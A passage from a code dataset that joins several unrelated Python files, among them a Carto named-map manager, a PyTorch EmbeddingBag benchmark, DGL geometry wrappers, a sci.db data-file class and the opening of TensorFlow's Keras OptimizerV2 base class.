self.send(self.Meta.collection_endpoint, "POST", json=params)
except CartoRateLimitException as e:
raise e
except Exception as e:
raise CartoException(e)
def update_from_dict(self, attribute_dict):
for k, v in attribute_dict.items():
if k in self.fields + self.optional_fields:
setattr(self, k, v)
class NamedMapManager(Manager):
"""
Manager for the NamedMap class
"""
resource_class = NamedMap
json_collection_attribute = "template_ids"
def create(self, **kwargs):
"""
Creates a named map
:param kwargs: Attributes for creating the named map. Specifically
an attribute `template` must contain the JSON object
defining the named map
:type kwargs: kwargs
:return: New named map object
:rtype: NamedMap
:raise: CartoException
"""
resource = self.resource_class(self.client)
resource.update_from_dict(kwargs['template'])
resource.save(force_create=True)
return resource
| 3.140625 | 3 |
client_driver.py | tlagore/kv_store | 0 | 1174 | from kv_client.kv_client import KVClient
def main():
kvSlave = KVClient(1, "127.0.0.1", 3456)
kvSlave.start()
if __name__ == "__main__":
main() | 1.390625 | 1 |
pytorch-frontend/benchmarks/operator_benchmark/pt/embeddingbag_test.py | AndreasKaratzas/stonne | 206 | 1175 | <reponame>AndreasKaratzas/stonne<filename>pytorch-frontend/benchmarks/operator_benchmark/pt/embeddingbag_test.py
import operator_benchmark as op_bench
import torch
import numpy
from . import configs
"""EmbeddingBag Operator Benchmark"""
class EmbeddingBagBenchmark(op_bench.TorchBenchmarkBase):
def init(self, embeddingbags, dim, mode, input_size, offset, sparse, include_last_offset, device):
self.embedding = torch.nn.EmbeddingBag(
num_embeddings=embeddingbags,
embedding_dim=dim,
mode=mode,
include_last_offset=include_last_offset,
sparse=sparse).to(device=device)
numpy.random.seed((1 << 32) - 1)
self.input = torch.tensor(numpy.random.randint(0, embeddingbags, input_size), device=device).long()
offsets = torch.LongTensor([offset], device=device)
self.offset = torch.cat((offsets, torch.tensor([self.input.size(0)], dtype=torch.long)), 0)
self.set_module_name('embeddingbag')
def forward(self):
return self.embedding(self.input, self.offset)
op_bench.generate_pt_test(configs.embeddingbag_short_configs, EmbeddingBagBenchmark)
op_bench.generate_pt_gradient_test(configs.embeddingbag_short_configs, EmbeddingBagBenchmark)
if __name__ == "__main__":
op_bench.benchmark_runner.main()
| 2.1875 | 2 |
python/dgl/geometry/capi.py | lfchener/dgl | 9,516 | 1176 | """Python interfaces to DGL farthest point sampler."""
from dgl._ffi.base import DGLError
import numpy as np
from .._ffi.function import _init_api
from .. import backend as F
from .. import ndarray as nd
def _farthest_point_sampler(data, batch_size, sample_points, dist, start_idx, result):
r"""Farthest Point Sampler
Parameters
----------
data : tensor
A tensor of shape (N, d) where N is the number of points and d is the dimension.
batch_size : int
The number of batches in the ``data``. N should be divisible by batch_size.
sample_points : int
The number of points to sample in each batch.
dist : tensor
Pre-allocated tensor of shape (N, ) for to-sample distance.
start_idx : tensor of int
Pre-allocated tensor of shape (batch_size, ) for the starting sample in each batch.
result : tensor of int
Pre-allocated tensor of shape (sample_points * batch_size, ) for the sampled index.
Returns
-------
No return value. The input variable ``result`` will be overwriten with sampled indices.
"""
assert F.shape(data)[0] >= sample_points * batch_size
assert F.shape(data)[0] % batch_size == 0
_CAPI_FarthestPointSampler(F.zerocopy_to_dgl_ndarray(data),
batch_size, sample_points,
F.zerocopy_to_dgl_ndarray(dist),
F.zerocopy_to_dgl_ndarray(start_idx),
F.zerocopy_to_dgl_ndarray(result))
def _neighbor_matching(graph_idx, num_nodes, edge_weights=None, relabel_idx=True):
"""
Description
-----------
The neighbor matching procedure of edge coarsening used in
`Metis <http://cacs.usc.edu/education/cs653/Karypis-METIS-SIAMJSC98.pdf>`__
and
`Graclus <https://www.cs.utexas.edu/users/inderjit/public_papers/multilevel_pami.pdf>`__
for homogeneous graph coarsening. This procedure keeps picking an unmarked
vertex and matching it with one its unmarked neighbors (that maximizes its
edge weight) until no match can be done.
If no edge weight is given, this procedure will randomly pick neighbor for each
vertex.
The GPU implementation is based on `A GPU Algorithm for Greedy Graph Matching
<http://www.staff.science.uu.nl/~bisse101/Articles/match12.pdf>`__
NOTE: The input graph must be bi-directed (undirected) graph. Call :obj:`dgl.to_bidirected`
if you are not sure your graph is bi-directed.
Parameters
----------
graph : HeteroGraphIndex
The input homogeneous graph.
num_nodes : int
The number of nodes in this homogeneous graph.
edge_weight : tensor, optional
The edge weight tensor holding non-negative scalar weight for each edge.
default: :obj:`None`
relabel_idx : bool, optional
If true, relabel resulting node labels to have consecutive node ids.
default: :obj:`True`
Returns
-------
a 1-D tensor
A vector with each element that indicates the cluster ID of a vertex.
"""
edge_weight_capi = nd.NULL["int64"]
if edge_weights is not None:
edge_weight_capi = F.zerocopy_to_dgl_ndarray(edge_weights)
node_label = F.full_1d(
num_nodes, -1, getattr(F, graph_idx.dtype), F.to_backend_ctx(graph_idx.ctx))
node_label_capi = F.zerocopy_to_dgl_ndarray_for_write(node_label)
_CAPI_NeighborMatching(graph_idx, edge_weight_capi, node_label_capi)
if F.reduce_sum(node_label < 0).item() != 0:
raise DGLError("Find unmatched node")
# reorder node id
# TODO: actually we can add `return_inverse` option for `unique`
# function in backend for efficiency.
if relabel_idx:
node_label_np = F.zerocopy_to_numpy(node_label)
_, node_label_np = np.unique(node_label_np, return_inverse=True)
return F.tensor(node_label_np)
else:
return node_label
_init_api('dgl.geometry', __name__)
| 2.203125 | 2 |
scidb/core/data.py | oxdc/sci.db | 0 | 1177 | import shutil
import hashlib
from pathlib import Path
from typing import TextIO, BinaryIO, IO, Union
from datetime import datetime
from os.path import getmtime
from .low import ObservableDict
class Data:
def __init__(self, data_name: str, parent, bucket,
protected_parent_methods: Union[None, dict] = None):
self.__data_name__ = data_name
self.__parent__ = parent
self.__bucket__ = bucket
self.__protected_parent_methods__ = protected_parent_methods
self.__protected_parent_methods__['increase_data_count']()
self.init_metadata()
self.init_properties()
@property
def database(self):
return self.__bucket__.db
@property
def db(self):
return self.__bucket__.db
@property
def bucket(self):
return self.__bucket__
def init_metadata(self):
if self.__data_name__ not in self.__parent__.metadata:
self.__parent__.metadata[self.__data_name__] = dict()
def init_properties(self):
if self.__data_name__ not in self.__parent__.properties:
self.__parent__.properties[self.__data_name__] = dict()
def set_metadata(self, metadata: Union[None, dict], merge: bool = True):
if metadata is None:
return
if merge:
metadata = {**self.metadata, **metadata}
self.__parent__.metadata[self.__data_name__] = metadata
def set_properties(self, properties: Union[None, dict], merge: bool = True):
if properties is None:
return
if merge:
properties = {**self.properties, **properties}
self.__parent__.properties[self.__data_name__] = properties
@property
def parent(self):
return self.__parent__
@property
def path(self) -> Path:
return self.__parent__.path / self.__data_name__
@property
def name(self) -> str:
return self.__data_name__
@property
def metadata(self) -> ObservableDict:
return self.__parent__.metadata[self.__data_name__]
@property
def properties(self) -> ObservableDict:
return self.__parent__.properties[self.__data_name__]
def rename(self, new_name: str):
shutil.move(str(self.path), str(self.__parent__.path / new_name))
self.__data_name__ = new_name
def reader(self, binary: bool = False, **kwargs) -> [IO, BinaryIO, TextIO, None]:
mode = 'r'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
def creator(self,
binary: bool = False,
confirm: bool = False,
feedback: bool = False,
**kwargs) -> [IO, BinaryIO, TextIO, None]:
if confirm and not feedback:
return None
mode = 'x'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
def writer(self,
binary: bool = False,
append: bool = True,
allow_overwrite: bool = False,
confirm: bool = True,
feedback: bool = False,
**kwargs) -> [IO, BinaryIO, TextIO, None]:
if not allow_overwrite and not append:
raise PermissionError('Trying to overwrite existed data.')
if confirm and not feedback:
return
mode = 'a' if append else 'w'
mode += 'b' if binary else ''
return open(str(self.path), mode=mode, **kwargs)
def __repr__(self):
return f"Data('{self.__data_name__}')"
def import_file(self, src_path: [str, Path], allow_overwrite=False, confirm=True, feedback=False):
if self.path.exists() and not allow_overwrite:
return
if confirm and not feedback:
return
shutil.copyfile(str(src_path), str(self.path))
def export_file(self, dst_path: [str, Path], allow_overwrite=False):
if Path(dst_path).exists() and not allow_overwrite:
return
shutil.copyfile(str(self.path), str(dst_path))
def __calc_hash__(self, h, buffer_size: int = 131072):
if not self.path.exists():
return None
with open(str(self.path), 'rb') as file_reader:
while True:
data = file_reader.read(buffer_size)
if not data:
break
h.update(data)
return h.hexdigest()
def md5(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'md5' not in self.metadata \
or 'md5-timestamp' not in self.metadata \
or self.metadata['md5-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.md5(), buffer_size)
self.metadata['md5'] = result
self.metadata['md5-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['md5']
def sha1(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'sha1' not in self.metadata \
or 'sha1-timestamp' not in self.metadata \
or self.metadata['sha1-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.sha1(), buffer_size)
self.metadata['sha1'] = result
self.metadata['sha1-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['sha1']
def sha256(self, buffer_size: int = 131072, require_update: bool = False) -> [str, None]:
if not self.path.exists():
return None
last_modified_time = getmtime(str(self.path))
if require_update \
or 'sha256' not in self.metadata \
or 'sha256-timestamp' not in self.metadata \
or self.metadata['sha256-timestamp'] < last_modified_time:
result = self.__calc_hash__(hashlib.sha256(), buffer_size)
self.metadata['sha256'] = result
self.metadata['sha256-timestamp'] = datetime.now().timestamp()
return result
else:
return self.metadata['sha256']
| 2.328125 | 2 |
tensorflow/python/keras/optimizer_v2/optimizer_v2.py | PaulWang1905/tensorflow | 9 | 1178 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Version 2 of class Optimizer."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import functools
import six
from tensorflow.python.distribute import distribution_strategy_context as distribute_ctx
from tensorflow.python.distribute import reduce_util as ds_reduce_util
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.keras import initializers
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.optimizer_v2 import learning_rate_schedule
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables as tf_variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import revived_types
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
def _deduplicate_indexed_slices(values, indices):
"""Sums `values` associated with any non-unique `indices`.
Args:
values: A `Tensor` with rank >= 1.
indices: A one-dimensional integer `Tensor`, indexing into the first
dimension of `values` (as in an IndexedSlices object).
Returns:
A tuple of (`summed_values`, `unique_indices`) where `unique_indices` is a
de-duplicated version of `indices` and `summed_values` contains the sum of
`values` slices associated with each unique index.
"""
unique_indices, new_index_positions = array_ops.unique(indices)
summed_values = math_ops.unsorted_segment_sum(
values, new_index_positions,
array_ops.shape(unique_indices)[0])
return (summed_values, unique_indices)
@six.add_metaclass(abc.ABCMeta)
@keras_export("keras.optimizers.Optimizer")
class OptimizerV2(trackable.Trackable):
"""Updated base class for optimizers.
This class defines the API to add Ops to train a model. You never use this
class directly, but instead instantiate one of its subclasses such as
`tf.keras.optimizers.SGD`, `tf.keras.optimizers.Adam`.
### Usage
```python
# Create an optimizer with the desired parameters.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# `loss` is a callable that takes no argument and returns the value
# to minimize.
loss = lambda: 3 * var1 * var1 + 2 * var2 * var2
# In graph mode, returns op that minimizes the loss by updating the listed
# variables.
opt_op = opt.minimize(loss, var_list=[var1, var2])
opt_op.run()
# In eager mode, simply call minimize to update the list of variables.
opt.minimize(loss, var_list=[var1, var2])
```
### Custom training loop with Keras models
In Keras models, sometimes variables are created when the model is first
called, instead of construction time. Examples include 1) sequential models
without input shape pre-defined, or 2) subclassed models. Pass var_list as
callable in these cases.
Example:
```python
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
model = tf.keras.Sequential()
model.add(tf.keras.layers.Dense(num_hidden, activation='relu'))
model.add(tf.keras.layers.Dense(num_classes, activation='sigmoid')
loss_fn = lambda: tf.keras.losses.mse(model(input), output)
var_list_fn = lambda: model.trainable_weights
for input, output in data:
opt.minimize(loss_fn, var_list_fn)
```
### Processing gradients before applying them.
Calling `minimize()` takes care of both computing the gradients and
applying them to the variables. If you want to process the gradients
before applying them you can instead use the optimizer in three steps:
1. Compute the gradients with `tf.GradientTape`.
2. Process the gradients as you wish.
3. Apply the processed gradients with `apply_gradients()`.
Example:
```python
# Create an optimizer.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# Compute the gradients for a list of variables.
with tf.GradientTape() as tape:
loss = <call_loss_function>
vars = <list_of_variables>
grads = tape.gradient(loss, vars)
processed_grads = [process_gradient(g) for g in grads]
grads_and_vars = zip(processed_grads, var_list)
# grads_and_vars is a list of tuples (gradient, variable). Do whatever you
# need to the 'gradient' part, for example cap them, etc.
capped_grads_and_vars = [(MyCapper(gv[0]), gv[1]) for gv in grads_and_vars]
# Ask the optimizer to apply the capped gradients.
opt.apply_gradients(capped_grads_and_vars)
```
### Use with `tf.distribute.Strategy`.
This optimizer class is `tf.distribute.Strategy` aware, which means it
automatically sums gradients across all replicas. To average gradients,
you divide your loss by the global batch size, which is done
automatically if you use `tf.keras` built-in training or evaluation loops.
See the `reduction` argument of your loss which should be set to
`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` for averaging or
`tf.keras.losses.Reduction.SUM` for not.
If you are not using these and you want to average gradients, you should use
`tf.math.reduce_sum` to add up your per-example losses and then divide by the
global batch size. Note that when using `tf.distribute.Strategy`, the first
component of a tensor's shape is the *replica-local* batch size, which is off
by a factor equal to the number of replicas being used to compute a single
step. As a result, using `tf.math.reduce_mean` will give the wrong answer,
resulting in gradients that can be many times too big.
### Variable Constraint
All Keras optimizers respect variable constraints. If constraint function is
passed to any variable, the constraint will be applied to the variable after
the gradient has been applied to the variable.
Important: If gradient is sparse tensor, variable constraint is not supported.
### Thread Compatibility
The entire optimizer is currently thread compatible, not thread-safe. The user
needs to perform synchronization if necessary.
### Slots
Many optimizer subclasses, such as `Adam` and `Adagrad` allocate and manage
additional variables associated with the variables to train. These are called
<i>Slots</i>. Slots have names and you can ask the optimizer for the names of
the slots that it uses. Once you have a slot name you can ask the optimizer
for the variable it created to hold the slot value.
This can be useful if you want to log debug a training algorithm, report stats
about the slots, etc.
### Hyper parameters
These are arguments passed to the optimizer subclass constructor
(the `__init__` method), and then passed to `self._set_hyper()`.
They can be either regular Python values (like 1.0), tensors, or
callables. If they are callable, the callable will be called during
`apply_gradients()` to get the value for the hyper parameter.
Hyper parameters can be overwritten through user code:
Example:
```python
# Create an optimizer with the desired parameters.
opt = tf.keras.optimizers.SGD(learning_rate=0.1)
# `loss` is a callable that takes no argument and returns the value
# to minimize.
loss = lambda: 3 * var1 + 2 * var2
# In eager mode, simply call minimize to update the list of variables.
opt.minimize(loss, var_list=[var1, var2])
# update learning rate
opt.learning_rate = 0.05
opt.minimize(loss, var_list=[var1, var2])
```
### Write a customized optimizer.
If you intend to create your own optimization algorithm, simply inherit from
this class and override the following methods:
- resource_apply_dense (update variable given gradient tensor is dense)
- resource_apply_sparse (update variable given gradient tensor is sparse)
- create_slots (if your optimizer algorithm requires additional variables)
- get_config (serialization of the optimizer, include all hyper parameters)
"""
def __init__(self, name, **kwargs):
"""Create a new Optimizer.
This must be called by the constructors of subclasses.
Note that Optimizer instances should not bind to a single graph,
and so shouldn't keep Tensors as member variables. Generally
you should be able to use the _set_hyper()/state.get_hyper()
facility instead.
This class in stateful and thread-compatible.
Args:
name: A non-empty string. The name to use for accumulators created
for the optimizer.
**kwargs: keyword arguments. Allowed to be {`clipnorm`, `clipvalue`, `lr`,
`decay`}. `clipnorm` is clip gradients by norm; `clipvalue` is clip
gradients by value, `decay` is included for backward compatibility to
allow time inverse decay of learning rate. `lr` is included for backward
compatibility, recommended to use `learning_rate` instead.
Raises:
ValueError: If name is malformed.
RuntimeError: If _create_slots has been overridden instead of
_create_vars.
"""
allowed_kwargs = {"clipnorm", "clipvalue", "lr", "decay"}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError("Unexpected keyword argument "
"passed to optimizer: " + str(k))
# checks that all keyword arguments are non-negative.
if kwargs[k] < 0:
raise ValueError("Expected {} >= 0, received: {}".format(k, kwargs[k]))
self._use_locking = True
self._name = name
self._hyper = {}
# dict: {variable name : {slot name : variable}}
self._slots = {}
self._slot_names = []
self._weights = []
self._iterations = None
# For implementing Trackable. Stores information about how to restore
# slot variables which have not yet been created
# (trackable._CheckpointPosition objects).
# {slot_name :
# {_var_key(variable_to_train): [checkpoint_position, ... ], ... },
# ... }
self._deferred_slot_restorations = {}
decay = kwargs.pop("decay", 0.0)
if decay < 0.:
raise ValueError("decay cannot be less than 0: {}".format(decay))
self._initial_decay = decay
if "clipnorm" in kwargs:
self.clipnorm = kwargs.pop("clipnorm")
if "clipvalue" in kwargs:
self.clipvalue = kwargs.pop("clipvalue")
self._hypers_created = False
def minimize(self, loss, var_list, grad_loss=None, name=None):
"""Minimize `loss` by updating `var_list`.
This method simply computes gradient using `tf.GradientTape` and calls
`apply_gradients()`. If you want to process the gradient before applying
then call `tf.GradientTape` and `apply_gradients()` explicitly instead
of using this function.
Args:
loss: A callable taking no arguments which returns the value to minimize.
var_list: list or tuple of `Variable` objects to update to minimize
`loss`, or a callable returning the list or tuple of `Variable` objects.
Use callable when the variable list would otherwise be incomplete before
`minimize` since the variables are created at the first time `loss` is
called.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
name: Optional name for the returned operation.
Returns:
An Operation that updates the variables in `var_list`. If `global_step`
was not `None`, that operation also increments `global_step`.
Raises:
ValueError: If some of the variables are not `Variable` objects.
"""
grads_and_vars = self._compute_gradients(
loss, var_list=var_list, grad_loss=grad_loss)
return self.apply_gradients(grads_and_vars, name=name)
def _compute_gradients(self, loss, var_list, grad_loss=None):
"""Compute gradients of `loss` for the variables in `var_list`.
This is the first part of `minimize()`. It returns a list
of (gradient, variable) pairs where "gradient" is the gradient
for "variable". Note that "gradient" can be a `Tensor`, an
`IndexedSlices`, or `None` if there is no gradient for the
given variable.
Args:
loss: A callable taking no arguments which returns the value to minimize.
var_list: list or tuple of `Variable` objects to update to minimize
`loss`, or a callable returning the list or tuple of `Variable` objects.
Use callable when the variable list would otherwise be incomplete before
`minimize` and the variables are created at the first time when `loss`
is called.
grad_loss: Optional. A `Tensor` holding the gradient computed for `loss`.
Returns:
A list of (gradient, variable) pairs. Variable is always present, but
gradient can be `None`.
Raises:
TypeError: If `var_list` contains anything else than `Variable` objects.
ValueError: If some arguments are invalid, or var_list is None.
"""
# TODO(josh11b): Test that we handle weight decay in a reasonable way.
with backprop.GradientTape() as tape:
if not callable(var_list):
tape.watch(var_list)
loss_value = loss()
if callable(var_list):
var_list = var_list()
var_list = nest.flatten(var_list)
grads = tape.gradient(loss_value, var_list, grad_loss)
if hasattr(self, "clipnorm"):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, "clipvalue"):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
grads_and_vars = list(zip(grads, var_list))
self._assert_valid_dtypes([
v for g, v in grads_and_vars
if g is not None and v.dtype != dtypes.resource
])
return grads_and_vars
def get_gradients(self, loss, params):
"""Returns gradients of `loss` with respect to `params`.
Arguments:
loss: Loss tensor.
params: List of variables.
Returns:
List of gradient tensors.
Raises:
ValueError: In case any gradient cannot be computed (e.g. if gradient
function not implemented).
"""
params = nest.flatten(params)
with backend.get_graph().as_default():
grads = gradients.gradients(loss, params)
for grad, param in zip(grads, params):
if grad is None:
raise ValueError("Variable {} has `None` for gradient. "
"Please make sure that all of your ops have a "
"gradient defined (i.e. are differentiable). "
"Common ops without gradient: "
"K.argmax, K.round, K.eval.".format(param))
if hasattr(self, "clipnorm"):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, "clipvalue"):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def apply_gradients(self, grads_and_vars, name=None):
"""Apply gradients to variables.
This is the second part of `minimize()`. It returns an `Operation` that
applies gradients.
Args:
grads_and_vars: List of (gradient, variable) pairs.
name: Optional name for the returned operation. Default to the name
passed to the `Optimizer` constructor.
Returns:
An `Operation` that applies the specified gradients. If `global_step`
was not None, that operation also increments `global_step`.
Raises:
TypeError: If `grads_and_vars` is malformed.
ValueError: If none of the variables have gradients.
"""
grads_and_vars = _filter_grads(grads_and_vars)
var_list = [v for (_, v) in grads_and_vars]
# Create iteration if necessary.
with ops.init_scope():
_ = self.iterations
self._create_hypers()
self._create_slots(var_list)
self._prepare(var_list)
return distribute_ctx.get_replica_context().merge_call(
self._distributed_apply, args=(grads_and_vars,), kwargs={"name": name})
def _distributed_apply(self, distribution, grads_and_vars, name):
"""`apply_gradients` using a `DistributionStrategy`."""
reduced_grads = distribution.extended.batch_reduce_to(
ds_reduce_util.ReduceOp.SUM, grads_and_vars)
var_list = [v for _, v in grads_and_vars]
grads_and_vars = zip(reduced_grads, var_list)
def apply_grad_to_update_var(var, grad):
"""Apply gradient to variable."""
if isinstance(var, ops.Tensor):
raise NotImplementedError("Trying to update a Tensor ", var)
if isinstance(grad, ops.IndexedSlices):
if var.constraint is not None:
raise RuntimeError(
"Cannot use a constraint function on a sparse variable.")
return self._resource_apply_sparse_duplicate_indices(
grad.values, var, grad.indices)
update_op = self._resource_apply_dense(grad, var)
if var.constraint is not None:
with ops.control_dependencies([update_op]):
return var.assign(var.constraint(var))
else:
return update_op
update_ops = []
with backend.name_scope(name or self._name):
for grad, var in grads_and_vars:
scope_name = ("" if ops.executing_eagerly_outside_functions() else
"_" + var.op.name)
with backend.name_scope("update" + scope_name):
update_ops.extend(
distribution.extended.update(
var, apply_grad_to_update_var, args=(grad,), group=False))
any_symbolic = any(isinstance(i, ops.Operation) or
tf_utils.is_symbolic_tensor(i) for i in update_ops)
if not context.executing_eagerly() or any_symbolic:
# If the current context is graph mode or any of the update ops are
# symbolic then the step update should be carried out under a graph
# context. (eager updates execute immediately)
with ops._get_graph_from_inputs(update_ops).as_default(): # pylint: disable=protected-access
with ops.control_dependencies(update_ops):
return self._iterations.assign_add(1).op
return self._iterations.assign_add(1)
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
grads_and_vars = list(zip(grads, params))
self._assert_valid_dtypes([
v for g, v in grads_and_vars
if g is not None and v.dtype != dtypes.resource
])
return [self.apply_gradients(grads_and_vars)]
def _set_hyper(self, name, value):
"""set hyper `name` to value. value can be callable, tensor, numeric."""
if isinstance(value, trackable.Trackable):
self._track_trackable(value, name, overwrite=True)
if name not in self._hyper:
self._hyper[name] = value
else:
prev_value = self._hyper[name]
if (callable(prev_value)
or isinstance(prev_value,
(ops.Tensor, int, float,
learning_rate_schedule.LearningRateSchedule))
or isinstance(value, learning_rate_schedule.LearningRateSchedule)):
self._hyper[name] = value
else:
backend.set_value(self._hyper[name], value)
def _get_hyper(self, name, dtype=None):
if not self._hypers_created:
self._create_hypers()
value = self._hyper[name]
if isinstance(value, learning_rate_schedule.LearningRateSchedule):
return value
if callable(value):
value = value()
if dtype:
return math_ops.cast(value, dtype)
else:
return value
def __getattribute__(self, name):
"""Overridden to support hyperparameter access."""
try:
return super(OptimizerV2, self).__getattribute__(name)
except AttributeError as e:
# Needed to avoid infinite recursion with __setattr__.
if name == "_hyper":
raise e
# Backwards compatibility with Keras optimizers.
if name == "lr":
name = "learning_rate"
if name in self._hyper:
return self._get_hyper(name)
raise e
def __setattr__(self, name, value):
"""Override setattr to support dynamic hyperparameter setting."""
# Backwards compatibility with Keras optimizers.
if name == "lr":
name = "learning_rate"
if hasattr(self, "_hyper") and name in self._hyper:
self._set_hyper(name, value)
else:
super(OptimizerV2, self).__setattr__(name, value)
def get_slot_names(self):
"""A list of names for this optimizer's slots."""
return self._slot_names
def add_slot(self, var, slot_name, initializer="zeros"):
"""Add a new slot variable for `var`."""
if slot_name not in self._slot_names:
self._slot_names.append(slot_name)
var_key = _var_key(var)
slot_dict = self._slots.setdefault(var_key, {})
weight = slot_dict.get(slot_name, None)
if weight is None:
if isinstance(initializer, six.string_types) or callable(initializer):
initializer = initializers.get(initializer)
initial_value = functools.partial(
initializer, shape=var.shape, dtype=var.dtype)
else:
initial_value = initializer
strategy = distribute_ctx.get_strategy()
with strategy.extended.colocate_vars_with(var):
weight = tf_variables.Variable(
name="%s/%s" % (var._shared_name, slot_name), # pylint: disable=protected-access
dtype=var.dtype,
trainable=False,
initial_value=initial_value)
backend.track_variable(weight)
slot_dict[slot_name] = weight
self._restore_slot_variable(
slot_name=slot_name, variable=var,
slot_variable=weight)
self._weights.append(weight)
return weight
def get_slot(self, var, slot_name):
var_key = _var_key(var)
slot_dict = self._slots[var_key]
return slot_dict[slot_name]
def _prepare(self, var_list):
pass
def _create_hypers(self):
if self._hypers_created:
return
# Iterate hyper values deterministically.
for name, value in sorted(self._hyper.items()):
if isinstance(value, ops.Tensor) or callable(value):
continue
else:
self._hyper[name] = self.add_weight(
name,
shape=[],
trainable=False,
initializer=value,
aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
self._hypers_created = True
@property
def iterations(self):
"""Variable. The number of training steps this Optimizer has run."""
if self._iterations is None:
self._iterations = self.add_weight(
"iter",
shape=[],
dtype=dtypes.int64,
trainable=False,
aggregation=tf_variables.VariableAggregation.ONLY_FIRST_REPLICA)
self._weights.append(self._iterations)
return self._iterations
@iterations.setter
def iterations(self, variable):
if self._iterations is not None:
raise RuntimeError("Cannot set `iterations` to a new Variable after "
"the Optimizer weights have been created")
self._iterations = variable
self._weights.append(self._iterations)
def _decayed_lr(self, var_dtype):
"""Get decayed learning rate as a Tensor with dtype=var_dtype."""
lr_t = self._get_hyper("learning_rate", var_dtype)
if isinstance(lr_t, learning_rate_schedule.LearningRateSchedule):
local_step = math_ops.cast(self.iterations, var_dtype)
lr_t = math_ops.cast(lr_t(local_step), var_dtype)
if self._initial_decay > 0.:
local_step = math_ops.cast(self.iterations, var_dtype)
decay_t = self._get_hyper("decay", var_dtype)
lr_t = lr_t / (1. + decay_t * local_step)
return lr_t
@abc.abstractmethod
def get_config(self):
"""Returns the config of the optimimizer.
An optimizer config is a Python dictionary (serializable)
containing the configuration of an optimizer.
The same optimizer can be reinstantiated later
(without any saved state) from this configuration.
Returns:
Python dictionary.
"""
config = {"name": self._name}
if hasattr(self, "clipnorm"):
config["clipnorm"] = self.clipnorm
if hasattr(self, "clipvalue"):
config["clipvalue"] = self.clipvalue
return config
@classmethod
def from_config(cls, config, custom_objects=None):
"""Creates an optimizer from its config.
This method is the reverse of `get_config`,
capable of instantiating the same optimizer from the config
dictionary.
Arguments:
config: A Python dictionary, typically the output of get_config.
custom_objects: A Python dictionary mapping names to additional Python
objects used to create this optimizer, such as a function used for a
hyperparameter.
Returns:
An optimizer instance.
"""
if "lr" in config:
config["learning_rate"] = config.pop("lr")
if "learning_rate" in config:
if isinstance(config["learning_rate"], dict):
config["learning_rate"] = learning_rate_schedule.deserialize(
config["learning_rate"], custom_objects=custom_objects)
return cls(**config)
def _serialize_hyperparameter(self, hyperparameter_name):
"""Serialize a hyperparameter that can be a float, callable, or Tensor."""
value = self._hyper[hyperparameter_name]
if isinstance(value, learning_rate_schedule.LearningRateSchedule):
return learning_rate_schedule.serialize(value)
if callable(value):
return value()
if tensor_util.is_tensor(value):
return backend.get_value(value)
return value
def variables(self):
"""Returns variables of this Optimizer based on the order created."""
return self._weights
@property
def weights(self):
"""Returns variables of this Optimizer based on the order created."""
return self._weights
def get_weights(self):
params = self.weights
return backend.batch_get_value(params)
# TODO(tanzheny): Maybe share this logic with base_layer.
def set_weights(self, weights):
params = self.weights
if len(params) != len(weights):
raise ValueError(
"You called `set_weights(weights)` on optimizer " + self._name +
" with a weight list of length " + str(len(weights)) +
", but the optimizer was expecting " + str(len(params)) +
" weights. Provided weights: " + str(weights)[:50] + "...")
if not params:
return
weight_value_tuples = []
param_values = backend.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError("Optimizer weight shape " + str(pv.shape) +
" not compatible with "
"provided weight shape " + str(w.shape))
weight_value_tuples.append((p, w))
backend.batch_set_value(weight_value_tuples)
def add_weight(self,
name,
shape,
dtype=None,
initializer="zeros",
trainable=None,
synchronization=tf_variables.VariableSynchronization.AUTO,
aggregation=tf_variables.VariableAggregation.NONE):
if dtype is None:
dtype = dtypes.float32
if isinstance(initializer, six.string_types) or callable(initializer):
initializer = initializers.get(initializer)
if synchronization == tf_variables.VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
